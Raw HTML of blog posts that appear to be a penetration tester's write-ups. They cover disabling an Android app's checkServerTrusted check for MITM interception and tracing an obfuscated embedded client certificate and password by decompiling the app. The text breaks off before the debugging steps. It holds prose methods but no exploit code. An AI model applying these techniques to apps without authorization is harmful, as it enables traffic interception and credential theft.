text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMoILGTUmPYtJt2Ttjcz8NCDgxnD_RUTaqmDGf0XQYJPrAdV1GAVBOXyRcmLDdGkTLSOFOBZR6vHvLjHheaj_MG5WtqcEsSVwEAHKjVWGOgs3kUglj6maxCSZLf3bIdnHm5_BqrtOBINBp/s1600/check-server-trusted-method-modified.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="188" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMoILGTUmPYtJt2Ttjcz8NCDgxnD_RUTaqmDGf0XQYJPrAdV1GAVBOXyRcmLDdGkTLSOFOBZR6vHvLjHheaj_MG5WtqcEsSVwEAHKjVWGOgs3kUglj6maxCSZLf3bIdnHm5_BqrtOBINBp/s400/check-server-trusted-method-modified.png" width="400" /></a></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<b style="font-weight: normal;"><br /><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 21px; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></b>
<br />
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: x-large;">Recompiling and Deploying the Modified Application</span></span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 17px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
<span style="font-family: Calibri; font-size: 17px; vertical-align: baseline; white-space: pre-wrap;">Confident that all </span><span style="font-family: 'Courier New'; font-size: 17px; vertical-align: baseline; white-space: pre-wrap;">checkServerTrusted</span><span style="font-family: Calibri; font-size: 17px; vertical-align: baseline; white-space: pre-wrap;"> invocations from this point onwards were going to be successful, I recompiled the application with </span><span style="font-family: 'Courier New'; font-size: 17px; vertical-align: baseline; white-space: pre-wrap;">ApkTool</span><span style="font-family: Calibri; font-size: 17px; vertical-align: baseline; white-space: pre-wrap;">, signed it with </span><span style="font-family: 'Courier New'; font-size: 17px; vertical-align: baseline; white-space: pre-wrap;">SignApk</span><span style="font-family: Calibri; font-size: 17px; vertical-align: baseline; white-space: pre-wrap;"> and deployed it on the device. The web proxy MiTM worked like a charm and I was able view, modify and fuzz application traffic.</span></div>
Gursev Singh Kalrahttp://www.blogger.com/profile/11125392470187170013noreply@blogger.com3tag:blogger.com,1999:blog-4663432300421783651.post-88276171770107278262013-10-29T07:51:00.000-07:002013-10-29T07:52:13.868-07:00Debugging Out a Client Certificate from an Android Process<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">I had setup my web proxy to intercept the Android application’s traffic, tested the proxy configuration with HTTPS based Android applications and the traffic interception worked like a charm. However, for the application under test, things were different. Connections to the applications’ server returned </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">HTTP 403</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> error code because SSL mutual authentication was enforced and I did not have the client certificate. The image below shows the error message.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSgCP6u71iLFjtUGJUEnEX7Ew-M_PAnjuh2wsJYjS5ni5954kw9mXExX_ggSqa1fqbiPydE7XNUSP5ABDheEFH3wm3gbTnt3oElmJdhBUxSLbjHvTH1mimoR9Xrx0crz7cbEMxX_5u85hp/s1600/server-403-error.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="226" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSgCP6u71iLFjtUGJUEnEX7Ew-M_PAnjuh2wsJYjS5ni5954kw9mXExX_ggSqa1fqbiPydE7XNUSP5ABDheEFH3wm3gbTnt3oElmJdhBUxSLbjHvTH1mimoR9Xrx0crz7cbEMxX_5u85hp/s400/server-403-error.png" width="400" /></a></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">I was in a situation where no meaningful communication could be established with the remote server. The resource files obtained by decompiling the application did not contain containing the client certificate and it was clear that it was stored in the obfuscated code somewhere. </span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">RSAPrivateCrtKey</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> and two certificates were already extracted from the application’s memory as discussed in the </span><a href="http://gursevkalra.blogspot.com/2013/10/extracting-rsaprivatecrtkey-and.html" style="text-decoration: none;"><span style="background-color: transparent; color: blue; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">previous</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> blog post. As it turned out, those were not sufficient and I still needed the client certificate and the corresponding password to be able to connect to the server and test the server side code. This blog post will how they were retrieved by debugging the application. </span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: large; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Identifying the Code Using the Client Certificate</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The knowledge of how Java clients use SSL certificate to support client authentication proved critical during this assessment and helped me identify the function calls to look for during the debugging process. The typical steps followed to load a client certificate for a </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">HttpsURLConnection</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> are summarized below:</span></div>
<ol style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Create instances of following classes:</span></div>
</li>
<ol style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: lower-alpha; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">HttpsURLConnection</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> – to communicate with the remote server</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: lower-alpha; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">KeyStore</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> – to hold client certificate</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: lower-alpha; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">KeyManagerFactory</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> – to hold </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">KeyStore</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: lower-alpha; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">SSLContext</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> – to hold </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">KeyManager</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></div>
</li>
</ol>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Create </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">File</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> instance for the client certificate and wrap it inside an </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">InputStream</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Invoke </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">KeyStore</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> instance’s load method with </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">InputStream</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> from step 2 and certificate password as </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">char[]</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> so it contains the client certificate</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Feed the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">KeyManagerFactory</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> instance with </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">KeyStore</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> from step 3 and certificate password by invoking its </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">init</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> method</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Obtain </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">KeyManager[]</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> array from the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">KeyManagerFactory</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> created above</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Invoke </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">SSLContext</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> intance’s </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">init</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> method and feed it the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">KeyManager</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">[] from step 5</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Obtain a </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">SSLSocketFactory</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> from the created </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">SSLContext</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> and setup the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">HttpsURLConnection</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> instance to use it for all SSL communication.</span></div>
</li>
</ol>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The following image depicts the steps discussed:</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_lOhDP_qv7Nhou-A3nL1m0K29hrx9xeyQtUoSBHiiTTwwcI1el65I927ppqGw6JfkXJYMks2Ga2fbl3FesrK6zp0ov6qG0WpupkdMfen6vUATpHo3ZJw31g0G_LhjnLCOkSGG7-1qR0CS/s1600/java-client-certificate-support.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="327" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_lOhDP_qv7Nhou-A3nL1m0K29hrx9xeyQtUoSBHiiTTwwcI1el65I927ppqGw6JfkXJYMks2Ga2fbl3FesrK6zp0ov6qG0WpupkdMfen6vUATpHo3ZJw31g0G_LhjnLCOkSGG7-1qR0CS/s400/java-client-certificate-support.jpg" width="400" /></a></div>
<b style="font-weight: normal;"><br /><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></b>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Instantiating a </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">KeyStore</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> and loading an </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">InputStream</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> for a client certificate are central to SSL client authentication support. So I searched the decompiled code for </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">KeyStore</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> class usage, corresponding instance variables and identified classes and methods that were potentially configuring the client side SSL certificate for </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">HttpsURLConnection</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">.</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: large; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Locating the Debug Points</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">I continued to eliminate </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">KeyStore</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> usages till I identified the class and method I was interested in. The identified class and method did not refer to any resource files to get the client certificate and its password but relied on couple of function calls to get the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">byte[]</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> representation for client certificate and </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">String</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> representation for the password before feeding them to the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">load</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> method of the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">KeyStore</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> instance. Following the code paths led me to the two magic strings that I was looking for. They appeared to be </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Base64</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> encoded values of client certificate and the corresponding password. </span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Base64</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> decoding them returned gibberish which could not be put to any practical use as there was more to the encoded values than plain </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Base64</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> encoding. Further analysis revealed that they were subjected to standard crypto algorithms, and those algorithms were fed their Initialization Vectors and Encryption Keys from other Java classes. Additionally, the application also used some custom data manipulation tricks to further obfuscate them.</span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">With limited time at hand I decided to briefly shelve the code analysis and move to application debugging to inspect the exact code points of interest for data extraction. To help with the debugging process, I noted down the class name, method name, and instance variable of interest where the potential client certificate and password were fed to the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">KeyStore</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> instance. </span></div>
<div dir="ltr" style="line-height: 1.1500000000000001; margin-bottom: 10pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: large; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Setting up the Application for Debugging</span></div>
